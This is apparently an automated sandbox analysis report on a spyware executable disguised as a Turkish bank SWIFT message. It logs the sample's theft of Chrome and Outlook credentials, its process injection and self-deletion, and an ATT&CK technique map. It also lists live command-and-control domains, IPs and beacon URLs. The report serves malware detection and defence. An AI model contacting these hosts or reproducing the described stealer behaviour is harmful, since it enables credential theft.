      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Stealing of Sensitive Information

      barindex
      Source: Yara matchFile source: 0000000A.00000002.507596524.0000000000710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.507392181.00000000006D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000000.341390351.000000000DF40000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.506554045.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.372243150.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Windows\SysWOW64\cscript.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
      Source: C:\Windows\SysWOW64\cscript.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
      Source: C:\Windows\SysWOW64\cscript.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
      Source: C:\Windows\SysWOW64\cscript.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
      Source: C:\Windows\SysWOW64\cscript.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
      Source: C:\Windows\SysWOW64\cscript.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
      Source: C:\Windows\SysWOW64\cscript.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior

      Remote Access Functionality

      barindex
      Source: Yara matchFile source: 0000000A.00000002.507596524.0000000000710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.507392181.00000000006D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000000.341390351.000000000DF40000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.506554045.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.372243150.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid Accounts1
      Shared Modules
      Path Interception612
      Process Injection
      1
      Masquerading
      1
      OS Credential Dumping
      121
      Security Software Discovery
      Remote Services1
      Email Collection
      Exfiltration Over Other Network Medium1
      Encrypted Channel
      Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
      Disable or Modify Tools
      LSASS Memory2
      Process Discovery
      Remote Desktop Protocol1
      Archive Collected Data
      Exfiltration Over Bluetooth3
      Ingress Tool Transfer
      Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)31
      Virtualization/Sandbox Evasion
      Security Account Manager31
      Virtualization/Sandbox Evasion
      SMB/Windows Admin Shares1
      Data from Local System
      Automated Exfiltration4
      Non-Application Layer Protocol
      Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)612
      Process Injection
      NTDS1
      Remote System Discovery
      Distributed Component Object ModelInput CaptureScheduled Transfer114
      Application Layer Protocol
      SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
      Deobfuscate/Decode Files or Information
      LSA Secrets13
      System Information Discovery
      SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.common3
      Obfuscated Files or Information
      Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup Items12
      Software Packing
      DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
      File Deletion
      Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 750683 Sample: Ziraat Bankasi Swift Mesaji... Startdate: 21/11/2022 Architecture: WINDOWS Score: 100 31 www.emiliayenrique.com 2->31 33 wws-proxy-prod-linux2.us-east-1.elasticbeanstalk.com 2->33 35 proxy.wws.theknot.com 2->35 39 Malicious sample detected (through community Yara rule) 2->39 41 Antivirus detection for URL or domain 2->41 43 Multi AV Scanner detection for submitted file 2->43 45 6 other signatures 2->45 9 Ziraat Bankasi Swift Mesaji20221121.exe 3 2->9         started        signatures3 process4 file5 23 Ziraat Bankasi Swi...aji20221121.exe.log, ASCII 9->23 dropped 55 Injects a PE file into a foreign processes 9->55 13 Ziraat Bankasi Swift Mesaji20221121.exe 9->13         started        signatures6 process7 signatures8 57 Modifies the context of a thread in another process (thread injection) 13->57 59 Maps a DLL or memory area into another process 13->59 61 Sample uses process hollowing technique 13->61 63 Queues an APC in another process (thread injection) 13->63 16 explorer.exe 13->16 injected process9 dnsIp10 25 www.oaksinstitute.net 103.11.189.189, 49719, 49720, 80 VODIEN-AS-AP-LOC2VodienInternetSolutionsPteLtdSG Singapore 16->25 27 notarpucarhr.com 141.136.43.229, 49715, 80 SENDER-ASLT Lithuania 16->27 29 4 other IPs or domains 16->29 37 System process connects to network (likely due to code injection or exploit) 16->37 20 cscript.exe 13 16->20         started        signatures11 process12 signatures13 47 Tries to steal Mail credentials (via file / registry access) 20->47 49 Tries to harvest and steal browser information (history, passwords, etc) 20->49 51 Deletes itself after installation 20->51 53 2 other signatures 20->53

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      Ziraat Bankasi Swift Mesaji20221121.exe28%ReversingLabsByteCode-MSIL.Spyware.Noon
      Ziraat Bankasi Swift Mesaji20221121.exe100%Joe Sandbox ML
      No Antivirus matches
      SourceDetectionScannerLabelLinkDownload
      1.0.Ziraat Bankasi Swift Mesaji20221121.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
      SourceDetectionScannerLabelLink
      www.oaksinstitute.net0%VirustotalBrowse
      SourceDetectionScannerLabelLink
      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
      http://www.tiro.com0%URL Reputationsafe
      http://www.goodfont.co.kr0%URL Reputationsafe
      http://www.carterandcone.coml0%URL Reputationsafe
      http://www.sajatypeworks.com0%URL Reputationsafe
      http://www.multimediapages.com/qmpa/?3f-T6nI=rejTwVtqfB30O9nwV+ATTccd4/r3ZShDvm2ExT48d5W41t5gt2xe96xDcyDktEvrNydQ6GKmhPSZbQq/61fgMLb8wiC572LGglGnkN+mkNWG&j6=hfNT100%Avira URL Cloudmalware
      http://www.typography.netD0%URL Reputationsafe
      http://www.oaksinstitute.net/qmpa/?3f-T6nI=5Yvs1mt+8koK04wDmvle7hFJkaWhy6okw1CCpgEhtGW9Nwizn2cFt5qaMIq71RWOXG0+Z4ku5zJzPR6AZImnXlyB2HME2hA2u33jFcxbHUjt&j6=hfNT100%Avira URL Cloudmalware
      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
      http://fontfabrik.com0%URL Reputationsafe
      http://www.founder.com.cn/cn0%URL Reputationsafe
      http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
      http://www.thetrendsinfo.com/qmpa/?3f-T6nI=8j1KE/HWtHcnH+pEPE5HkfDOmxDyQ368aF2j+bbJwew9gPbmW2dVDlZv4ybx5W4m8jPtBYTEvz/PBOnDTGQZn8CJHCh1MhyDPKi16ua84ged&j6=hfNT100%Avira URL Cloudmalware
      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
      http://www.sandoll.co.kr0%URL Reputationsafe
      http://www.urwpp.deDPlease0%URL Reputationsafe
      http://www.zhongyicts.com.cn0%URL Reputationsafe
      http://www.sakkal.com0%URL Reputationsafe
      http://www.notarpucarhr.com/qmpa/?3f-T6nI=EgIWtG18ZIzAqtaO1OmvkFLdPjhKt8Mp7J5Y1fxWkEB6Q9kPLkR881s923Q+G4W9S+aNob6MQv0YuDJ73eh9wGmaMy0jmQVwd4+wO+lCGFJf&j6=hfNT0%Avira URL Cloudsafe
      http://www.multimediapages.com/qmpa/100%Avira URL Cloudmalware
      http://www.oaksinstitute.net/qmpa/100%Avira URL Cloudmalware
      www.erwgcb.top/qmpa/0%Avira URL Cloudsafe
      http://www.thetrendsinfo.com/qmpa/100%Avira URL Cloudmalware
      NameIPActiveMaliciousAntivirus DetectionReputation
      www.oaksinstitute.net
      103.11.189.189
      truetrueunknown
      wws-proxy-prod-linux2.us-east-1.elasticbeanstalk.com
      3.209.28.237
      truefalse
        high
        notarpucarhr.com
        141.136.43.229
        truetrue
          unknown
          www.multimediapages.com
          38.239.92.131
          truetrue
            unknown
            thetrendsinfo.com
            68.66.216.12
            truetrue
              unknown
              www.thetrendsinfo.com
              unknown
              unknowntrue
                unknown
                www.emiliayenrique.com
                unknown
                unknowntrue
                  unknown
                  www.notarpucarhr.com
                  unknown
                  unknowntrue
                    unknown
                    NameMaliciousAntivirus DetectionReputation
                    http://www.multimediapages.com/qmpa/?3f-T6nI=rejTwVtqfB30O9nwV+ATTccd4/r3ZShDvm2ExT48d5W41t5gt2xe96xDcyDktEvrNydQ6GKmhPSZbQq/61fgMLb8wiC572LGglGnkN+mkNWG&j6=hfNTtrue
                    • Avira URL Cloud: malware
                    unknown
                    http://www.multimediapages.com/qmpa/true
                    • Avira URL Cloud: malware
                    unknown
                    http://www.oaksinstitute.net/qmpa/?3f-T6nI=5Yvs1mt+8koK04wDmvle7hFJkaWhy6okw1CCpgEhtGW9Nwizn2cFt5qaMIq71RWOXG0+Z4ku5zJzPR6AZImnXlyB2HME2hA2u33jFcxbHUjt&j6=hfNTtrue
                    • Avira URL Cloud: malware
                    unknown
